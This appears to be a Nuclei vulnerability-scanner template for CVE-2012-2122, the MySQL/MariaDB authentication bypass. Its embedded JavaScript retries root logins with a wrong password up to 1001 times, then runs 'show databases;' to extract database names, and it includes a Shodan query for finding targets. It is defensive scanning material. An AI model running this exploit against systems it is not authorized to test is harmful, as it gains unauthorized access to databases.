id: CVE-2012-2122 info: name: MySQL - Authentication Bypass author: pussycat0x severity: medium description: | sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value. reference: - https://github.com/vulhub/vulhub/tree/master/mysql/CVE-2012-2122 - http://kb.askmonty.org/en/mariadb-5162-release-notes/ - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html - http://security.gentoo.org/glsa/glsa-201308-06.xml - http://securitytracker.com/id?1027143 classification: cvss-metrics: CVSS:2.0/AV:N/AC:H/Au:N/C:P/I:P/A:P cvss-score: 5.1 cve-id: CVE-2012-2122 cwe-id: CWE-287 epss-score: 0.97019 epss-percentile: 0.99732 cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:* metadata: verified: true vendor: oracle product: mysql shodan-query: product:"MySQL" tags: cve,cve2012,js,enum,network,mssql,fuzz javascript: - code: | const mysql = require('nuclei/mysql'); const client = new mysql.MySQLClient; for (let i = 1; i <= 1001; i++) { try { const connected = client.ExecuteQuery(Host, Port, User, Pass, Query); Export(connected); break; } catch { // error } } args: Host: "{{Host}}" Port: 3306 User: "root" Pass: "wrong" Query: "show databases;" matchers: - type: dsl dsl: - "success == true" extractors: - type: json part: response json: - .Rows[] | .Database # digest: 4a0a004730450220257cea6847023e5a3eadf5c1a18c4f2a2df145542fe09c89c61ddad28bfe44e9022100e5936a8580cc7882f2e8c441aff795b4fc479fa6552599a3eb1abca1ac7f9a65:922c64590222798bb761d5b6d8e72950